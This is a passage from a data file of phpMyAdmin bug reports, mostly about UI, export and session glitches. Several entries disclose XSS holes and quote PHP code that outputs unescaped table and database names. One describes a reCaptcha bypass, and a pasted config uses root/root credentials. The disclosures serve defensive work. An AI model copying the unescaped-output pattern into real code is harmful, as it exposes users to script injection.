Enter some db name and add some privileges to it for this user 6.
On the panel showing the resulting GRANT statement, the username is clickable so click on it 7.
You should see the same panel as in step 3, except that there is no submenu Original URL https sourceforge.net p phpmyadmin bugs 4433 Original author lem9 Found in version 4.2.2","bug"
"24444","10840","Unchecking Show SQL queries results NaN.
In appearance settings, select tab SQL Queries .
Uncheck Show SQL queries .
Then click Home icon on navigation panel and edit some table.
Instead of SQL query a NaN is displayed.
phpMyAdmin 4.2.2.
Original URL https sourceforge.net p phpmyadmin bugs 4434 Original author timomoisio Found in version 4.2.2 Attachment http sourceforge.net p phpmyadmin bugs 4434 attachment nimet C3 B6n.jpg","bug"
"24444","10841","WHERE clause can be undefined.
It seems that the tr.find .where clause ).val ) in js makegrid.js can be undefined.
This report is related to user submitted report [ 1008] https reports.phpmyadmin.net reports view 1008) on the phpmyadmin error reporting server.
Original URL https sourceforge.net p phpmyadmin bugs 4435 Original author phpmyadmin bot Found in version 4.2.3","bug"
"24444","10842","Insert form numeric field with function drop down list.
Issue description HTML5 compliant browser Server > Database > Table Insert panel Function drop down list Numeric field Function CRC32, impossible to enter function s argument string) as INPUT field s type is set as number .
Solution libraries insert edit.lib.php function PMA getHTMLinput surround block if in array column[ True Type ], GLOBALS[ PMA Types ] >getIntegerTypes ) )) { input type = number ; is unsigned = substr column[ pma type ], 9) === unsigned ; min max values = GLOBALS[ PMA Types ] >getIntegerRange column[ True Type ], !
is unsigned ); input min max = min= .
min max values[0] .
.
max= .
min max values[1] .
; } in if !
GLOBALS[ cfg ][ ShowFunctionFields ]) { } Original URL https sourceforge.net p phpmyadmin bugs 4436 Original author edward n Found in version 4.2.2","bug"
"24444","10843","xe2x80x9cToken Mismatchxe2x80x9d Error In Safari via MAMP.
After much research and repeated, failed attempts to fix this problem, I am still getting a Token Mismatch error when I try to use phpMyAdmin in Safari accessing a MAMP dev server.
Here s some relevant info Yes, I ve searched for answers online and have tried the various suggested solutions; none have solved the problem I do not get the error in Chrome or any other browser; only Safari I m sure my tmp directory is set correctly in php.ini I m sure my tmp directory has been properly flushed before firing up PMA in Safari This problem has persisted across versions of PMA, Safari, PHP, and OSX.
Updating and upgrading has never affected on the bug.
See versions listed below) System OSX 10.9.3 Safari 7.0.4 PMA 4.2.2 MAMP 2.2 PHP 5.3.3 Original URL https sourceforge.net p phpmyadmin bugs 4438 Original author sstringer Found in version 4.2.2","bug"
"24444","10844","Table list in left panel doesn t expand.
Click a database name on the left.
The list of tables expands as normal.
Click a table name and it stays open.
But if you do certain actions on a table, the left pane keeps closing.
When you click the table name in the breadcrumb at the top of the main panel.
One definite action to get this bug is to open a table in a new tab, i.e.
right click on the table name in the left panel and click open in new tab .
But it also happened a few times in general use, possibly when running update insert queries from the query box.
Original URL https sourceforge.net p phpmyadmin bugs 4439 Original author svivian Found in version 4.2.2","bug"
"24444","10845","Column name center aligned instead of left aligned in Relations.
Column name center aligned instead of left aligned in Relations It s in Internal relations.
You might also want to vertically align it.
Original URL https sourceforge.net p phpmyadmin bugs 4748 Original author olafvdspek Found in version 4.3.8","bug"
"24444","10846","Javascript error when renaming table.
Go to a table, then to the Operations tab.
Type a new name in the Rename table to box and click Go.
A Javascript error appears the table is renamed fine, however).
There was also an error sending the error report, so here s the details exception { mode onerror , message Uncaught TypeError Cannot read property substring of undefined , stack [ { line 151, func refreshMain , context [ return void , , refreshMain function url, callback) { , if !
url) { , url = selflink a ).attr href ); , url = url.substring 0, url.indexOf ?
)); , } , url = PMA commonParams.getUrlQuery ); , , {href url}) , .appendTo body ) , .click ) ], filename common.js } ], useragent Mozilla 5.0 Macintosh; Intel Mac OS X 10 9 3) AppleWebKit 537.36 KHTML, like Gecko) Chrome 35.0.1916.114 Safari 537.36 , name TypeError , uri tbl operations.php?target= }, script name tbl operations.php , pma version 4.2.2 , browser name CHROME , browser version 35.0.1916.114 , user os Mac , server software Apache 2.2.26 Unix) DAV 2 PHP 5.4.24 mod ssl 2.2.26 OpenSSL 0.9.8y , user agent string Mozilla 5.0 Macintosh; Intel Mac OS X 10 9 3) AppleWebKit 537.36 KHTML, like Gecko) Chrome 35.0.1916.114 Safari 537.36 , locale en , configuration storage enabled , php version 5.4.24 , I m using PMA from Github STABLE branch).
Original URL https sourceforge.net p phpmyadmin bugs 4440 Original author svivian Found in version 4.2.2","bug"
"24444","10847","Carriage returns are added to text fields.
To reproduce Go to a table with a TEXT field.
Edit it click the pencil icon for full page edit, not inline edit) and add some new lines.
Save.
The field now has \r\n as the new lines, not \n.
This happens on Mac and Linux, both of which use solely \n as new line indicators.
Original URL https sourceforge.net p phpmyadmin bugs 4441 Original author svivian Found in version 4.2.2","bug"
"24444","10848","Incorrect page after creating table.
After creating a table it returns you to the DB.
IMO it should return you to the new table.
Didn t this work correctly before?
Original URL https sourceforge.net p phpmyadmin bugs 4752 Original author olafvdspek Found in version 4.3.9","bug"
"24444","10849","Normal field and multi line field have different margins.
Hi, Normal field and multi line field have different margins in the row insert form.
Original URL https sourceforge.net p phpmyadmin bugs 4753 Original author olafvdspek Found in version 4.3.8","bug"
"24444","10850","New lines are added to query every time.
Go to the Browse mode of a table.
Click Inline to edit the query.
Run any query with a new line after it.
Click inline again.
An extra new line keeps getting added, every time you run a query.
If you keep clicking inline then go without changing anything) you end up with many blank lines.
Original URL https sourceforge.net p phpmyadmin bugs 4442 Original author svivian Found in version 4.2.2","bug"
"24444","10851","Incorrect insert statement in SQL Export.
Exporting query which uses mysql functions such as count ) produces incorrect insert statements in SQL export.
Steps to reproduce 1) Execute some query like this select count ) from `sakila`.`actor` 2) Click export from Query results operations panel.
3) Export with default configurations i.e.
Format SQL, Export Method Quick).
This will generate insert into statement in export like this INSERT INTO `actor` `count )`) VALUES 200); which is erroneous because there is no column named count ) .
Original URL https sourceforge.net p phpmyadmin bugs 4443 Original author chirayu45 Found in version 4.2.2","bug"
"24444","10852","Dump binary columns in hexadecimal notation not working.
While exporting a table with binary type columns BINARY, VARBINARY) with Dump binary columns in hexadecimal notation checked, does not export binary data in hexadecimal notation only BLOB types BLOB, TINYBLOB etc.)
are exported in hexadecimal notation See attached sql file).
I think binary columns should also get exported in hexadecimal notation.
Original URL https sourceforge.net p phpmyadmin bugs 4448 Original author chirayu45 Found in version 4.2.3 Attachment http sourceforge.net p phpmyadmin bugs 4448 attachment fr982.sql","bug"
"24444","10853","Ok 4.2.4) MediaWiki table export does not produce table header row.
Exporting a table with Export table headers checked does not produce header row with column names of the table.
Original URL https sourceforge.net p phpmyadmin bugs 4449 Original author chirayu45 Found in version 4.2.3","bug"
"24444","10854","Query is duplicated on Ctrl Enter.
When executing a query with Ctrl Enter, the full query is duplicated and inserted where the cursor is.
Original URL https sourceforge.net p phpmyadmin bugs 4450 Original author sharpless78 Found in version 4.2.3","bug"
"24444","10855","Navigate Away cut pasting content using mouse and leaving the page with unsaved data.
It does not cover mouse operations.
Currently the patch uses keyup event so it listens only changes through keyboard.
If someone right click the field and cut paste content from field it does not detect those.
Original URL https sourceforge.net p phpmyadmin bugs 4451 Original author chirayu45 Found in version Latest Git","bug"
"24444","10856","Navigate Away Reverting the changes to field still prompts on leaving page.
If the field contains some value already default value) and you change it, and then undo those changes, getting the value of the field to the old one, it will still prompt about navigating away.
Steps to reproduce 1] Go to browse tab of a table.
2] Click on edit of a row not inline editing).
3] On Edit page, the fields will be populated with current values.
Change any field value.
4] Change that field again so that it is same as old value which was populated by default.
5] Click on some link, try to navigate away from the page.
Original URL https sourceforge.net p phpmyadmin bugs 4452 Original author chirayu45 Found in version Latest Git","bug"
"24444","10857","Navigate Away Truncating a field value and leaving page does not prompt.
If field contains some value by default, and you truncate empty) the contents of the field and leave the page without saving then it does not prompt about leaving the page.
Steps to reproduce 1] Go to browse tab of a table.
2] Click on edit button of a row not inline editing).
3] On Edit page, the fields will be populated with current values.
4] Truncate empty) any field value.
5] Click on some link, try to navigate away from the page.
Original URL https sourceforge.net p phpmyadmin bugs 4453 Original author chirayu45 Found in version Latest Git","bug"
"24444","10858","Autologout destroys current runnig session.
I m not sure how why you have an redirect to the startpage after some time, but it looks like this routine is not correct I often use the Feature of inline editing sql statements reexecute them.
In Previuos releases this caused the whole page to reload, but now, you use js to do the job.
It looks like this does not reset the timer to go to the landing page.
One more thing if you create another instance of phpmyadmin by right clicking on a table, open in new tab window) the second instance just opens where you want, good.
But if the first instance timeouts event though the session on the server never ended) the second instance is killed too, since the first one destroys the whole session on logout .
Original URL https sourceforge.net p phpmyadmin bugs 4762 Original author mokraemer Found in version 4.2.13","bug"
"24444","10859","PMA DatabaseInterface getColumnsFull ) when called with no database or table parameter gives incorrectly nested keys.. PMA DatabaseInterface getColumnsFull ) when used with empty database or table name causes the few keys to be incorrectly nested.
For e.g.
output = GLOBALS[ dbi ] >getColumnsFull ); The output here returns array something like this http pastebin.com Ca4721yJ i.e.
[database name 1] => array [table name 1] => array [Column name 1] => array Field => [value], TABLE NAME => [value], COLUMN NAME => [value], ... and other column properties ) Below part has problems Field => [value], TABLE NAME => [value], ... and other column properties are being added at table level causing problems to get table names properly.
Also, if there is a table named Field or TABLE NAME then the output gets more wierd.
It only works fine if both database and table name is given.
The code which is adding those keys have been documented as to be removed https github.com phpmyadmin phpmyadmin blob QA 4 2 libraries DatabaseInterface.class.php L1111 onwards).
I have checked the places where it has been used and currently all calls to the function have specified database table name, causing this issue to remain unnoticed.
Original URL https sourceforge.net p phpmyadmin bugs 4454 Original author chirayu45 Found in version 4.2.3","bug"
"24444","10860","Relation does not work.
1. unpack pma 4.2.3 2. mkdir config 3. got to setup index.php, use config type, use suggested pmadb names etc., use root user and password for both main and relations.
4. save settings to config.inc.php 5. rm config 6. import examples create tables.sql 7. go to pma.
all works ok. even pmadb.
but all relations tables are not ok .
and no explanation why!
==================== <?php Servers configuration i = 0; Server localhost [1] i ; cfg[ Servers ][ i][ verbose ] = ; cfg[ Servers ][ i][ host ] = localhost ; cfg[ Servers ][ i][ port ] = ; cfg[ Servers ][ i][ socket ] = ; cfg[ Servers ][ i][ connect type ] = tcp ; cfg[ Servers ][ i][ auth type ] = config ; cfg[ Servers ][ i][ user ] = root ; cfg[ Servers ][ i][ password ] = root ; User used to manipulate with storage cfg[ Servers ][ i][ controlhost ] = ; cfg[ Servers ][ i][ controlport ] = ; cfg[ Servers ][ i][ controluser ] = root ; cfg[ Servers ][ i][ controlpass ] = root ; Storage database and tables cfg[ Servers ][ i][ pmadb ] = phpmyadmin ; cfg[ Servers ][ i][ bookmarktable ] = pma bookmark ; cfg[ Servers ][ i][ relation ] = pma relation ; cfg[ Servers ][ i][ table info ] = pma table info ; cfg[ Servers ][ i][ table coords ] = pma table coords ; cfg[ Servers ][ i][ pdf pages ] = pma pdf pages ; cfg[ Servers ][ i][ column info ] = pma column info ; cfg[ Servers ][ i][ history ] = pma history ; cfg[ Servers ][ i][ table uiprefs ] = pma table uiprefs ; cfg[ Servers ][ i][ tracking ] = pma tracking ; cfg[ Servers ][ i][ designer coords ] = pma designer coords ; cfg[ Servers ][ i][ userconfig ] = pma userconfig ; cfg[ Servers ][ i][ recent ] = pma recent ; cfg[ Servers ][ i][ favorite ] = pma favorite ; cfg[ Servers ][ i][ users ] = pma users ; cfg[ Servers ][ i][ usergroups ] = pma usergroups ; cfg[ Servers ][ i][ navigationhiding ] = pma navigationhiding ; cfg[ Servers ][ i][ savedsearches ] = pma savedsearches ; End of servers configuration cfg[ DefaultLang ] = en ; cfg[ ServerDefault ] = 1; cfg[ UploadDir ] = ; cfg[ SaveDir ] = ; ?> Original URL https sourceforge.net p phpmyadmin bugs 4455 Original author coviex Found in version 4.2.3","bug"
"24444","10861","4.2 is very very slow.
i have about 5000 databases and the new version can t handle that.
first page load takes at least 10 seconds.
sometimes the database tree reloads for no reason which means i have to wait at least 10 seconds.
something is wrong there because expading tables for one database takes about 10 seconds too.
also searching tables in one database.
so i guess it s reloading all the databases every time.
i don t need to refresh databases when i m doing only ajax calls how can i check what takes so long?
thanks Original URL https sourceforge.net p phpmyadmin bugs 4456 Original author freeman3 Found in version 4.2.3","bug"
"24444","10862","Ok 4.2.4) SQL tab Insert queries not showing affected row count.
When insert queries are executed through SQL tab, it does not show affected row count and always display MySQL returned an empty result set i.e.
zero rows).
.
With reference to this stackoverflow post https stackoverflow.com questions 24135506 how to show inserted affected rows after query with phpmyadmin 4 2 3 Original URL https sourceforge.net p phpmyadmin bugs 4457 Original author chirayu45 Found in version 4.2.3","bug"
"24444","10863","Preview doesn t work when adding a new column.
I m having a bit of difficulty with this feature; in my case I go to the structure page of an existing table and click the button to add a new column.
On the resulting page where I can set the column type for the new column), there is a Preview SQL button.
Clicking that button results in an empty dialog box, and the query actually runs anyway.
Original URL https sourceforge.net p phpmyadmin bugs 4458 Original author ibennetch Found in version Latest Git","bug"
"24444","10864","Missing value in the form message.
If SQL query page have been opened for some time e.g.
an hour) and I try to execute new SQL query, then I get error alert window with title Missing value in the form!
.
In the same time no ajax requests sent.
Error message got on 7585 line downloaded with next URL js get scripts.js.php?server=1 token=0625130da000d0f3e774fb6c95189de0 scripts[]=jquery jquery 1.8.3.min.js scripts[]=ajax.js scripts[]=keyhandler.js scripts[]=jquery jquery ui 1.9.2.custom.min.js scripts[]=jquery jquery.sprintf.js scripts[]=jquery jquery.cookie.js scripts[]=jquery jquery.mousewheel.js scripts[]=jquery jquery.event.drag 2.2.js scripts[]=jquery jquery ui timepicker addon.js scripts[]=jquery jquery.ba hashchange 1.3.js scripts[]=jquery jquery.debounce 1.0.5.js scripts[]=jquery jquery.menuResizer 1.0.js scripts[]=cross framing protection.js scripts[]=rte.js scripts[]=tracekit tracekit.js scripts[]=error report.js scripts[]=doclinks.js scripts[]=functions.js scripts[]=navigation.js scripts[]=indexes.js scripts[]=common.js scripts[]=codemirror lib codemirror.js scripts[]=codemirror mode sql sql.js scripts[]=codemirror addon runmode runmode.js See attached screenshot Original URL https sourceforge.net p phpmyadmin bugs 4461 Original author romy42 Found in version 4.1.11 Attachment http sourceforge.net p phpmyadmin bugs 4461 attachment Selection 038.png","bug"
"24444","10865","MariaDB version mismatch.
On the MariaDB demo server, there is a version mismatch <pre>Your PHP MySQL library version 5.5.40 differs from your MySQL server version 10.0.14.
This may cause unpredictable behavior.< pre> Server version 10.0.14 MariaDB 1 wheezy log mariadb.org binary distribution Database client version libmysql 5.5.40 PHP extension mysqli Documentation We should deal with this better.
Original URL https sourceforge.net p phpmyadmin bugs 4768 Original author ibennetch Found in version 4.3.9","bug"
"24444","10866","XSS injection due to unescaped db table name in recent favorite tables.
Reported by Chirayu Chiripal lt;chirayu.chiripal gmail.com gt; and Madhura Jayaratne lt;madhuracj gmail.com gt;.
Vulnerable Code Fragment 1 in PMA RecentFavoriteTable getHtmlList ) see https github.com phpmyadmin phpmyadmin blob QA 4 2 libraries RecentFavoriteTable.class.php L192) un escaped table and db name, from L205 to L211 html .= <li class= warp link > ; html .= <a href= sql.php?server= .
GLOBALS[ server ] .
db= .
table[ db ] .
table= .
table[ table ] .
token= .
SESSION[ PMA token ] .
>` .
table[ db ] .
`.` .
table[ table ] .
`< a> ; html .= < li> ; Similar use of db table name exist throughout the function.
Vulnerable Code Fragment 2 in structure.lib.php > PMA getHtmlForFavoriteAnchor ) see https github.com phpmyadmin phpmyadmin blob QA 4 2 libraries structure.lib.php L2736) un escaped table and db name, from L2739 to L2741 html output .= id= .
preg replace \s , , current table[ TABLE NAME ] ) .
favorite anchor ; Similar use of db table name exist at L2755 in the same function.
Original URL https sourceforge.net p phpmyadmin bugs 4465 Original author zweisteinsoft Found in version 4.2.0","bug"
"24444","10867","Previously set column aliases are destroyed if returned to the same table.
Original URL https sourceforge.net p phpmyadmin bugs 4769 Original author madhuracj Found in version 4.3.0","bug"
"24444","10868","shell exec ) has been disabled for security reasons.
This warning is displayed on every SQL result page see attachment).
This wasn t happening before why it needs to run shell exec at all?
Original URL https sourceforge.net p phpmyadmin bugs 4467 Original author azurit Found in version 4.2.4 Attachment http sourceforge.net p phpmyadmin bugs 4467 attachment pma warning.png","bug"
"24444","10869","reCaptcha defeated on partial entry.
reCaptcha can be defeated, with the numbers, in the photo, eg numbers 147, it can be PASSED on entering 1 and hitting enter, sometimes you need in this eg 14 enter and it passes, on wordings, enter the first word only and it passes I marked this as pri 9 because its best for others to do some testing as well, incase Google has had a problem in past hours.
Original URL https sourceforge.net p phpmyadmin bugs 4468 Original author noelb Found in version 4.2.4","bug"
"24444","10870","Can t log in.
phpinfo ) https 9f90ee4ff90ff8cfd7e92e868a2cb34dcef5c1af.googledrive.com host 0Bz6u7VbwRxguMklLNm4xcHJwSW8 index.html Basically, on the 4.2.4 version I can t login, the page just refreshes without any error and the token changes.
No errors in logs.
Every previous versions work.
Original URL https sourceforge.net p phpmyadmin bugs 4469 Original author kubk4 Found in version 4.2.4","bug"
"24444","10871","SQL error when database list is sorted by additional columns.
Original URL https sourceforge.net p phpmyadmin bugs 4778 Original author madhuracj Found in version 4.3.0","bug"
"24444","10872","Error while submitting empty query.
Connect and don t select any DB Go into SQL tab Leave SQL textarea blank Click on Go A JS error appears.
Original URL https sourceforge.net p phpmyadmin bugs 4470 Original author tithugues Found in version 4.2.4","bug"
"24444","10873","Undefined index warning with referenced column.. Steps to reproduce Go to sakila > actor table.
Click in structure tab.
Click on change link of actor id column.
Click on any other tab such as Browse tab.
An undefined index warning message at the bottom of the resulting page.
Notice in .
libraries relation.lib.php 1603 Undefined index actor id Backtrace .
libraries tbl columns definition form.inc.php 137 PMA checkChildForeignReferences string sakila , string actor , string actor id , ) .
libraries structure.lib.php 2309 include .
libraries tbl columns definition form.inc.php) .
tbl structure.php 45 PMA displayHtmlForColumnChange string sakila , string actor , NULL, string tbl structure.php , ) This happens for columns which are referenced by some other table.
For e.g.
sakila > address > address id sakila > category > category id Original URL https sourceforge.net p phpmyadmin bugs 4471 Original author chirayu45 Found in version 4.2.4","bug"
"24444","10874","Ticket for Testing.
Ticket for Testing!!
This bug ticket is being created for development of Linking Error Report with existing bug ticket feature of error reporting server.
Kindly ignore this ticket. )
This report is related to user submitted report [ 3] http 127.0.0.1 error reporting server reports view 3) on the phpmyadmin error reporting server.
Original URL https sourceforge.net p phpmyadmin bugs 4472 Original author playingdj Found in version 3.3.7","bug"
"24444","10875","Requery bookmark from console does not work.
When trying to requery a bookmark from console, I get the following error PHP Fatal error Call to a member function getTables ) on a non object in phpMyAdmin 4.3.10 english libraries relation.lib.php on line 1889 phpMyAdmin shows a Error in Processing Request then 500).
Steps to reproduce the issue have a bookmark in phpMyAdmin open Console at the bottom open Bookmarks select Requery on a bookmark a JavaScript confirmation message is shown accept see the error message Original URL https sourceforge.net p phpmyadmin bugs 4781 Original author ci dev Found in version 4.3.10","bug"
"24444","10876","Invalid JSON export.
Hi, When exporting a database to JSON, PHPMyAdmin produces invalid JSON output.
Indeed, PHPMyAdmin introduces new lines characters instead of escaping them as \n) in the quoted strings in the JSON, which is invalid.
Such output is something like { test toto foobar } Thanks Original URL https sourceforge.net p phpmyadmin bugs 4783 Original author phyks Found in version 4.3.4","bug"
"24444","10877","incorrect result count when having clause is used.
When select query having having clause is used in place of where clause i.e.
without using a group by statement like this select from sakila.actor having actor id = 1 It shows wrong number of rows in Showing rows.. message.
It shows total number of rows present in table in the message instead of actual number of rows present in result set.
With reference to this stackoverflow post http stackoverflow.com questions 24384953 phpmyadmin incorrect results count Original URL https sourceforge.net p phpmyadmin bugs 4473 Original author chirayu45 Found in version 4.2.4","bug"
"24444","10878","Input width on create relations when screen width more the 1600px.
Original URL https sourceforge.net p phpmyadmin bugs 4785 Original author greenpeas26 Found in version 3.4.7 Attachment http sourceforge.net p phpmyadmin bugs 4785 attachment pma1600px.png","bug"
"24444","10879","PMA behind loadbalancer wrong redirect to port 80.
Hi, if we open https example.com phpmyadmin we see the login page.
After filling out the details and clicking on login we get redirected to the wrong URL https example.com 80 phpmyadmin .
This bug was apparently already described in the bug reports 3538, 3692, 3704 and 4120 but either closed as fixed or invalid.
We use the latest version from the Ubuntu 12.04 repository 4 3.4.10.1 1 The problem is that we use a loadbalancer in front of the webservers to distribute the load and to terminate the SSL connections.
User to Loadbalancer is HTTPS and Loadbalancer to webserver is HTTP.
Since PHPMyAdmin receives the request via HTTP it sets the port incorrectly to 80.
In the config.inc.php we tried this settings cfg[ PmaAbsoluteUri ] = https example.com phpmyadmin ; cfg[ ForceSSL ] = true; but in libraries Config.class.php the following lines overwrite this Add port, if it not the default one if !
empty url[ port ]) url[ scheme ] == http url[ port ] != 80) || url[ scheme ] == https url[ port ] != 443))) { pma absolute uri .= .
url[ port ]; } Deleting those lines fixed the issue for us.
But with the next upgrade from the Ubuntu repository we will run into the same problem if this is not fixed upstream...
Original URL https sourceforge.net p phpmyadmin bugs 4474 Original author cidero Found in version 3.4.10","bug"
"24444","10880","Inline edit of DATE fields with NULL, NULL checkbox is under datepicker.
1.
Double click on the date 2.
A datepicker widget appears, also a checkbox for NULL, but this is hidden under the datepicker and thus not selectable Tested in current nightly in Firefox and Chrome CREATE TABLE IF NOT EXISTS `test` `ID` int 11) NOT NULL, `date` date DEFAULT NULL ) ENGINE=InnoDB AUTO INCREMENT=2 DEFAULT CHARSET=latin1; INSERT INTO `test` `ID`, `date`) VALUES 1, 2015 02 06 ); ALTER TABLE `test` ADD PRIMARY KEY `ID`); Original URL https sourceforge.net p phpmyadmin bugs 4788 Original author rm km it Found in version 4.3.11","bug"
"24444","10881","Testing..
Testing if it let s create bug ticket without milestone or not.
Original URL https sourceforge.net p phpmyadmin bugs 4475 Original author playingdj","bug"
"24444","10882","Ticket for Testing.
This report is related to user submitted report [ 3] http 127.0.0.1 error reporting server reports view 3) on the phpmyadmin error reporting server.
Original URL https sourceforge.net p phpmyadmin bugs 4476 Original author playingdj Found in version 3.3.7","bug"
"24444","10883","Ticket for Testing.
This report is related to user submitted report [ 3] http 127.0.0.1 error reporting server reports view 3) on the phpmyadmin error reporting server.
Original URL https sourceforge.net p phpmyadmin bugs 4477 Original author playingdj Found in version 3.3.7","bug"
"24444","10884","Server validation does not work while in setup mysqli.
PMA 4.1.14.1, PHP 5.3.28 run setup index.php , create a new server with the following parameters Connection type tcp , PHP extension to use mysqli , Server port 3306 or any other value which your MySQL server is listening to, this value cannot be left blank), click Apply , click Edit link, on the server list, next to a recently appended server, ,, Could not connect to MySQL server mysqli connect ) expects parameter 5 to be long, string given message appears.
This bug appears to be born with PMA 3.x when server validation was added to the setup script) and stills until PMA 4.2.5.
It occurs in test db connection ) at setup lib validate.lib.php 3.x), and in test db connection ) at libraries config validate.lib.php 4.0.x), and in PMA Validator testDBConnection ) at libraries config Validator.class.php 4.1.x, 4.2.x).
In these functions port value is constructed as a string of the form XXXX , where XXXX is the actual port number.
Ad hoc solution in mentioned above functions files change conn = mysqli connect host, user, pass, null, port, socket); to conn = mysqli connect host, user, pass, null, port ?
int)substr port, 1) null, socket); Original URL https sourceforge.net p phpmyadmin bugs 4478 Original author chncc Found in version 4.2.5","bug"
"24444","10885","Missing permission in export dir not detected.
In current master af1a674d255ec45615d373e6e632a3601c314498), a permission problem on the directory defined in cfg[ SaveDir ] is not detected.
Works fine in 4.2.5.
Original URL https sourceforge.net p phpmyadmin bugs 4479 Original author lem9 Found in version Latest Git","bug"
"24444","10886","Multi column sort click.
When I have a table sorted on a column, and I want to sort on a different column, my instinct is to just click that other column.
What actually happens is that the table gets sorted on both columns and requires a shift click to remove the previous column from the sort.
This is exactly backwards from standard UX behavior.
When I want to select multiple items in Windows, I shift click or ctrl click) to select multiple items.
If I have one item selected, and I want to simply select another item, I don t have to shift click my original item to deselect it before or after clicking on the new item.
I appreciate the new multi column sort feature, and agree that shift click should still be used to add remove columns from the sort tree, but a regular click on any column should replace the entire sort tree with that one column, even if it s already in the sort tree.
I sort on one column much more often than I sort on multiple columns, and my one sort column changes enough that having to click the new column, wait for the AJAX to catch up I have a moderately slow local server), become confused at the unexpectedly strange sorting, realize my mistake, then shift click my previous column and wait for AJAX to catch up again becomes tedious.
Original URL https sourceforge.net p phpmyadmin bugs 4480 Original author benjamwelker Found in version Latest Git","bug"
"24444","10887","mult submits.inc.php Undefined variable Error.
Before it happend I created a database and droped it at index.php, then clicked the SQL tab.
When it happend URL server sql.php?db= table= server=1 target= token=ebdb1c233ceecba22a27b98700408c16 Backtrace Notice in .
libraries mult submits.inc.php 135 Undefined variable db .
libraries server databases.lib.php 479 include .
libraries mult submits.inc.php) .
server databases.php 61 PMA dropMultiDatabases ) Notice in .
libraries mult submits.inc.php 207 Undefined variable db .
libraries server databases.lib.php 479 include .
libraries mult submits.inc.php) .
server databases.php 61 PMA dropMultiDatabases ) Notice in .
libraries mult submits.inc.php 207 Undefined variable table .
libraries server databases.lib.php 479 include .
libraries mult submits.inc.php) .
server databases.php 61 PMA dropMultiDatabases ) Original URL https sourceforge.net p phpmyadmin bugs 4481 Original author whalewatching Found in version 4.2.5","bug"
"24444","10888","Multi Column sorting improved user experience).
Hello, I would like to suggest on a bit changing current) Multi Column sorting behaviour to the more standart way used by other tools.
Problem with current method Most of the time we need to sort by one column only, so this forces us to do double job each time we need to perform sorting by only one column.
First I need to hold shift to unbind sorting from the column and only then I am able to sort by desired one) column.
Suggestion Allow us to sort by one column by default.
If user needs to do multi sorting, he would need to hold shift key and click on desired columns.
In case you prefer current method more, please give us an option to choose the behaviour we would like to have for Multi Column sorting.
I hope that my suggestion will be heared as this will greatly benefit users experience.
Thanks!
Linas Original URL https sourceforge.net p phpmyadmin bugs 4482 Original author crylar Found in version 4.2.5","bug"
"24444","10889","New window link selflink) disappears, causing Javascript error.
Recreating this ticket since the old one 4440) has been ignored and the issue is still occurring.
Using PMA 4.2.5, PHP 5.5.9, MySQL 5.5.37.
The new window button ID selflink) disappears under certain circumstances.
This also causes the JavaScript error listed in 4440.
To reproduce 1.
Go to a table and click the Import tab at the top.
2.
Import any data it doesn t have to complete successfully).
[At this point the selflink has disappeared.]
3.
Click the Operations tab at the top.
4.
Rename the table, and the JS error occurs, although the table is renamed fine.
Original URL https sourceforge.net p phpmyadmin bugs 4483 Original author svivian Found in version 4.2.5","bug"
"24444","10890","On selecting date, the datepicker disappears on master.
On master, for a field of type date , the datepicker disappears as you click on the datepicker to choose a date.
It doesn t happen on QA 4 3, according to git bisect it is happening since https github.com phpmyadmin phpmyadmin commit 038ed2dc047f1f47bac759bae4def4eda4e631e8 The expected behavior is that it should disappear only when clicking outside the datepicker widget, as correctly happens for datetime fields.
Original URL https sourceforge.net p phpmyadmin bugs 4800 Original author atul5 Found in version Latest Git","bug"
"24444","10891","Result Operation Bottom bar is empty for long query.
Hi, If we execute a long query, the function LinkOrButton doesn t return a form button but an empty result in Operation Results.
So you cannot do any operation on results...
Please test here with the query in attachment http demo.phpmyadmin.net master config index.php?db=sakila Request and screenshot in attachment.
Original URL https sourceforge.net p phpmyadmin bugs 4484 Original author jonathanags Found in version 4.2.5 Attachment http sourceforge.net p phpmyadmin bugs 4484 attachment S C3 A9lection 006.png Attachment http sourceforge.net p phpmyadmin bugs 4484 attachment request.sql","bug"
"24444","10892","Changelog page is not working.
If you are logged in not to first server in a list you can t open changelog link.
System just shows you login page and invalidate token.
Original URL https sourceforge.net p phpmyadmin bugs 4802 Original author jay04653 Found in version 4.3.11","bug"
"24444","10893","Sorting breaks the copy column feature.
Hello, when I double click on the column name href part the prompt window pops out and is closed right away, after this sorting happens.
In order to solve the problem I would suggest disabling rename feature on the following DOM element x3C;th data column= x22;.... x22; x3E;... x3C;a href= x22;sql.php?....
x22; x3E; x3C; a x3E; x3C; th x3E;).
Other posibilities to solve this put rename feature under hotkey or add icon somewhere near column name href that would be used to activate rename feature.
Best regards, Linas Original URL https sourceforge.net p phpmyadmin bugs 4485 Original author crylar Found in version 4.2.5","bug"
"24444","10894","XSS injection due to unescaped table comment.
Original URL https sourceforge.net p phpmyadmin bugs 4486 Original author lem9 Found in version 4.2.5","bug"
"24444","10895","Export of partitioned table does not import.
phpMyAdmin cannot export and import a table with partitioning and an auto increment key.
Create a simple table with partitioning.
CREATE TABLE test.test id INT AUTO INCREMENT PRIMARY KEY ) PARTITION BY HASH id); INSERT INTO test.test VALUES 326); Export test database.
See that the DDL is formatted with invalid syntax.
CREATE TABLE IF NOT EXISTS `test` `id` int 11) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1 !50100 PARTITION BY HASH id) AUTO INCREMENT=327 ; ALTER TABLE `test` ADD PRIMARY KEY `id`); Try to import, and get the following error 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near AUTO INCREMENT=327 at line 14 The same error happens if you try to import by using the mysql client.
Explanation The AUTO INCREMENT=327 is a table option, and all table options must appear before the PARTITION clause.
Original URL https sourceforge.net p phpmyadmin bugs 4487 Original author billkarwin Found in version 4.2.7","bug"
"24444","10896","XSS injection due to unescaped table name triggers).
Original URL https sourceforge.net p phpmyadmin bugs 4488 Original author lem9 Found in version 4.2.5","bug"
"24444","10897","Incorrect detection of privileges for routine creation.
As I updated to PMA 3.5.2 I cannot create new or edit stored prozedures String displayed You do not have the necessary privileges to create a routine ).
My user isn t the root user but have the CREATE ROUTINE privilege.
I tested on the same server the PMA alternative solution Chive with the same user and there I can create new procedures, so it must be a problem in PMA only.
PMA Version 3.5.2 MySQL Version 5.5 Original URL https sourceforge.net p phpmyadmin bugs 4489 Original author sisko1990 Found in version 4.2.5","bug"
"24444","10898","Broken find and replace.
Steps to reproduce 1. open table search page; 2. press Zoom Search and select any option; 3. press Find and Replace > receiving Error Token mismatch Original URL https sourceforge.net p phpmyadmin bugs 4810 Original author jay04653 Found in version 4.3.12","bug"
"24444","10899","Export produces 0 bytes file with no error message.
